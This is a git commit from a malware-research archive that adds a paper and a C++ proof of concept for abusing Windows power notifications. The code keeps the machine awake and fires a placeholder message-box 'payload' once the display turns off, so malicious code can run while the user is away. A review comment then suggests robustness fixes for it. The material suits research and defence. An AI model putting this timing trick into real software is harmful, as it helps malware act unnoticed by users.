commit 5b75d2e6d792c8efb896a71a49bc08140a7cabb3
Author: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Sun Oct 11 00:32:21 2020 -0500
Add files via upload
diff --git a/Abusing the Windows Power Management API/AbusingtheWindowsPowerManagementAPI.pdf b/Abusing the Windows Power Management API/AbusingtheWindowsPowerManagementAPI.pdf
new file mode 100644
index 0000000..37b93bc
Binary files /dev/null and b/Abusing the Windows Power Management API/AbusingtheWindowsPowerManagementAPI.pdf differ
diff --git a/Abusing the Windows Power Management API/src.cpp b/Abusing the Windows Power Management API/src.cpp
new file mode 100644
index 0000000..9abed81
--- /dev/null
+++ b/Abusing the Windows Power Management API/src.cpp
@@ -0,0 +1,91 @@
+#include
+#include
+#include
+
+#define WIN32_LEAN_AND_MEAN
+
+typedef DWORD(WINAPI* POWERSETTINGREGISTERNOTIFICATION)(LPCGUID, DWORD, HANDLE, PHPOWERNOTIFY);
+typedef DWORD(WINAPI* POWERSETTINGUNREGISTERNOTIFICATION)(HPOWERNOTIFY);
+
+ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting);
+
+int main(VOID)
+{
+ DWORD dwError = ERROR_SUCCESS;
+ HMODULE hLibrary;
+ POWERSETTINGREGISTERNOTIFICATION _PowerSettingRegisterNotification = NULL;
+ POWERSETTINGUNREGISTERNOTIFICATION _PowerSettingUnregisterNotification = NULL;
+ DEVICE_NOTIFY_SUBSCRIBE_PARAMETERS NotificationsParameters;
+ HANDLE hNotificationRegister = NULL;
+
+ hLibrary = LoadLibrary(L"powrprof.dll");
+ if (hLibrary == NULL)
+ goto FAILURE;
+
+ _PowerSettingRegisterNotification = (POWERSETTINGREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingRegisterNotification");
+ _PowerSettingUnregisterNotification = (POWERSETTINGUNREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingUnregisterNotification");
+
+ if (!_PowerSettingRegisterNotification || !_PowerSettingUnregisterNotification)
+ goto FAILURE;
+
+ NotificationsParameters.Callback = HandlePowerNotifications;
+ NotificationsParameters.Context = NULL;
+
+ if (_PowerSettingRegisterNotification(&GUID_CONSOLE_DISPLAY_STATE, DEVICE_NOTIFY_CALLBACK,
+ (HANDLE)&NotificationsParameters, &hNotificationRegister) != ERROR_SUCCESS)
+ {
+ goto FAILURE;
+ }
+
+ if (SetThreadExecutionState(ES_AWAYMODE_REQUIRED | ES_CONTINUOUS | ES_SYSTEM_REQUIRED) == NULL)
+ goto FAILURE;
+
+ while (1){ Sleep(100); }
+
+ if (hNotificationRegister)
+ _PowerSettingUnregisterNotification(hNotificationRegister);
+
+ return ERROR_SUCCESS;
+
+FAILURE:
+
+ dwError = GetLastError();
+
+ if (hNotificationRegister)
+ _PowerSettingUnregisterNotification(hNotificationRegister);
+
+ return dwError;
+
+}
+
+ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting)
+{
+ PPOWERBROADCAST_SETTING PowerSettings =
(PPOWERBROADCAST_SETTING)Setting;
+
+ if (Type == PBT_POWERSETTINGCHANGE && PowerSettings->PowerSetting == GUID_CONSOLE_DISPLAY_STATE)
+ {
+ switch (*PowerSettings->Data)
+ {
+ case 0x0:
+ case 0x2:
+ {
+ Sleep(10000);
+ MessageBoxW(NULL, L"Spooky Payload", L"", MB_OK);
+ break;
+ }
+
+ case 0x1:
+ {
+ Sleep(1);
+ break;
+ }
+
+ default:
+ {
+ break;
+ }
+ }
+ }
+
+ return ERROR_SUCCESS;
+}
\ No newline at end of file
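Review bot: In main, the `FAILURE` label reports `GetLastError()`, but `PowerSettingRegisterNotification` returns its Win32 error code directly (the hunk compares it with `ERROR_SUCCESS`) and that value is discarded, so a registration failure is reported as whatever stale last-error value happens to be set; capture it instead, `dwError = _PowerSettingRegisterNotification(&GUID_CONSOLE_DISPLAY_STATE, DEVICE_NOTIFY_CALLBACK, (HANDLE)&NotificationsParameters, &hNotificationRegister); if (dwError != ERROR_SUCCESS) goto FAILURE;` and at the label use `if (dwError == ERROR_SUCCESS) dwError = GetLastError();`. In HandlePowerNotifications, `*PowerSettings->Data` reads one byte of the payload without ever consulting `PowerSettings->DataLength`; the console display state is delivered as a DWORD, so guard with `if (PowerSettings->DataLength < sizeof(DWORD)) return ERROR_SUCCESS;` and read it via `DWORD state; memcpy(&state, PowerSettings->Data, sizeof state);` rather than a single-byte dereference. Note also that `while (1){ Sleep(100); }` never exits, so the unregister call and `return ERROR_SUCCESS` after it are dead code, and `hLibrary` is never released with `FreeLibrary` on any path. The 10-second `Sleep` inside the callback presumably blocks whichever thread delivers the notification; confirm against the API's threading contract before relying on it.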